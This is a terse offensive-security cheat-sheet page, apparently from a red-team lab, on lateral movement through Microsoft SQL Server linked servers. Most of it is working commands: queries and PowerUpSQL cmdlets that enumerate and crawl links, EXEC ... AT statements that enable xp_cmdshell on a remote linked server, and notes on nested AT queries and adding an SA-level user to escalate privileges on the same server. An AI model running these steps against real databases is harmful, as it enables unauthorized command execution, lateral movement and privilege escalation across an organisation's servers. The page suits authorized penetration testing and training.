MS SQL Lateral Movement

Discover any links (linked sql servers)

SELECT srvname, srvproduct, rpcout FROM master..sysservers;
EXEC sp_linkedservers

This shows a link to sql-1.cyberbotic.io

Query linked server using module

powershell Get-SQLServerLinkCrawl -Instance "sql-2.dev.cyberbotic.io,1433"

Enable xp_cmdshell on linked server

EXEC('sp_configure ''show advanced options'', 1; reconfigure;') AT [sql-1.cyberbotic.io] 
EXEC('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT [sql-1.cyberbotic.io]

Get linked server details

Get-SQLServerLink -Instance sql11 -Verbose

DatabaseLinkName       : SQL27
DatabaseLinkLocation   : Remote
Product                : SQL Server
Provider               : SQLNCLI
LocalLogin             : webapp11
RemoteLoginName        : webappGroup

In this case, local user 'webapp11' has access to linked server SQL27, it's remote name will be 'webappGroup'.

Come home to me

SQL server links are not bidirectional by default

Execute a query on dc01 and inside that, we’ll use it again to execute a query on appsrv01

Nested AT commands, we execute a query on appsrv01 to linked server dc01 to linked server appsrv01.

It is also important to notice the use of single quotes in the SQL query. We have to escape all embedded single quotes with single quotes, which means the inner string (show advanced options) needs four single quotes.

Add SA2 user for easy access to database 1

If no other privilege escalation paths are possible, we may be able to use a bidirectional link to elevate privileges on the same SQL server.

Last updated